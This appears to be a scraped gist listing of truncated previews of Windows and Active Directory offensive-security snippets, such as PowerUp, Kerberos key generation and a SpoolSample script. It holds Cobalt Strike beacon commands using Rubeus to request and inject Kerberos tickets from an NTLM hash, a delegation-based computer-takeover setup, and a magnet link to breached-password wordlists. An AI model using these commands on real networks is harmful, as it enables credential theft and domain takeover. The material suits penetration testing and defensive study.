This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This idea originated from this blog post on Invoke DSC Resources directly: | |
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/ | |
<# | |
$MOFContents = @' | |
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref | |
{ | |
ResourceID = "[Script]ScriptExample"; | |
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
PowerUp aims to be a clearinghouse of common Windows privilege escalation | |
vectors that rely on misconfigurations. See README.md for more information. | |
Author: @harmj0y | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None | |
#> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-KerberosAESKey | |
{ | |
<# | |
.SYNOPSIS | |
Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The | |
results have been verified against the test values in RFC3962, MS-KILE, and my own test lab. | |
https://tools.ietf.org/html/rfc3962 | |
https://msdn.microsoft.com/library/cc233855.aspx |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# grab a TGT b64 blob with a valid NTLM | |
beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH | |
# decode the base64 blob to a binary .kirbi | |
$ base64 -d ticket.b64 > ticket.kirbi | |
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
beacon> make_token DOMAIN\USER PassWordDoesntMatter | |
# inject the .kirbi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Get-CidrHostCount { | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory)] | |
[ValidateRange(1,32)] | |
$Cidr | |
) | |
Begin { | |
} # End Begin. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
# some code from https://www.exploit-db.com/exploits/2879/ | |
import os | |
import sys | |
import argparse | |
import binascii | |
import ConfigParser |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/safebrowsing/rd/CltOb12nLW1IbHehcmUtd2hUdmFzEBAY7-0KIOkUDC7h2,/safebrowsing/rd/CINnu27nLO8hbHdfgmUtc2ihdmFyEAcY4|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
` | |
~/ | |
~ | |
×™× | |
___ | |
__ | |
_ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
magnet:?xt=urn:btih:827FBFFA925AF95BA20C7C0BA8D35807C1E31C75&dn=Combined_HaveIBeenPwnedWordlists.txt&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce |